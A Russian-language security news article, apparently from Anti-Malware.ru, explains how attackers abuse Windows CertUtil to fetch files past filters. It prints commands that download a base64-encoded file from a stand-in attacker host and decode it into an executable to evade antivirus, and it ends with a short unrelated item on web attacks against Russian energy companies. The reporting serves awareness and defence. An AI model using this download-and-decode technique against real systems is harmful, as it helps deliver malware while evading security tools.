CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам

CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам

CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам

Эксперты в области безопасности обеспокоены использованием киберпреступниками встроенной в Windows программы CertUtil во вредоносных целях. CertUtil предназначена для управления сертификатами в Windows, с помощью этой программы вы можете устанавливать, создавать резервную копию, удалять и управлять хранилищами сертификатов в Windows.

Одной из особенностей CertUtil является возможность загрузить сертификат или любой другой файл по удаленному URL-адресу, сохранив его в виде локального файла. Для этого используется следующий синтаксис: «certutil.exe -urlcache -split -f [URL] output.file».

Еще в 2017 году исследователь Кейси Смит в Twitter выразил обеспокоенность тем, что этот метод можно использовать для загрузки вредоносных программ.

Опасения Смита подтвердились, так как недавно обнаруженный троян с марта этого года использует этот метод для загрузки различных пакетных файлов и сценариев на зараженный компьютер.

В качестве преимущества этого механизма загрузки вредоносных файлов эксперты называют возможность обойти различные фильтры, которые бы не позволили сделать это любой другой программе.

Ксавье Мертенс, консультант по вопросам безопасности, опубликовал свою версию использования CertUtil для загрузки злонамеренного содержимого. Чтобы параллельно обойти антивирусные сканеры, Мертенс предлагает кодировать файл при помощи base64, что позволит представить его как безобидный текст.

После загрузки текстового файла команда «certutil.exe -decode» может использоваться для декодирования файла в исполняемый:

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe

Более того, некоторые специалисты сообщают о том, что такой метод уже используется киберпреступными группами.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Всплеск веб-атак на российскую энергетику: за три дня — двукратный рост

Специалисты в области кибербезопасности зафиксировали резкий рост числа веб-атак на сайты российских энергетических компаний. Особенно заметен всплеск в последние рабочие дни перед майскими праздниками — с 28 по 30 апреля.

За этот короткий период количество атак на ресурсы одной из таких компаний увеличилось вдвое по сравнению с предыдущей неделей. Все попытки были отражены средствами защиты.

Большая часть атак (58%) — это блокировки по IP-адресам, которые заранее были внесены в черные списки на основе анализа угроз. Такие списки формируются вручную специалистами, исходя из уже известных сценариев атак.

Остальные 42% пришлись на автоматические сканеры, которые пытаются находить уязвимости в веб-приложениях — обычно в расчёте на последующее проникновение.

Энергетический сектор сегодня особенно уязвим: с одной стороны, он зависит от автоматизированных систем, а с другой — не всегда имеет должный уровень защиты. Любая утечка данных или сбой может обернуться серьёзными проблемами — как для конкретной компании, так и для стабильности в целом.

В таких условиях защита веб-приложений, особенно тех, что содержат личные кабинеты и персональные данные, должна быть постоянной задачей. Здесь важно не только уметь реагировать на атаки, но и упреждать их, действуя на опережение.

В прошлом месяце мы сообщали о новой целевой атаке Lazarus: вредонос через новостные сайты и баги в софте.

У нас также вышло интервью с Игорем Кузнецовым, директором Kaspersky GReAT. Эксперт рассказал, как «Лаборатория Касперского» поймала «Форумного тролля» и нашла 0-day в Google Chrome.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru